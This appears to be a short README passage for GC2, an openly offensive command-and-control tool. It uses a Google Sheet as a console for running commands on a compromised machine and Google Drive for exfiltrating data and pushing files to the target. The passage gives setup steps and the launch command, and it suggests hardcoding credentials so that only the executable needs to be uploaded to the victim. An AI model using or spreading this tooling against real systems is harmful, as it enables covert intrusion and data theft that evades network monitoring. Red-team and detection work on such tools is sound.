GC2 (Google Command and Control) is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrates data using Google Drive.
Create a new Google Drive folder and add the service account to the editor group of the folder (to add the service account use its email)
Start the C2
gc2-sheet --key <GCP service account credential file .JSON > --sheet <Google sheet ID> --drive <Google drive ID>
PS: you can also hardcode the parameters in the code, so you will upload only the executable on the target machine (look at comments in root.go and authentication.go)
- Command execution using Google Sheet as a console
- Download files on the target using Google Drive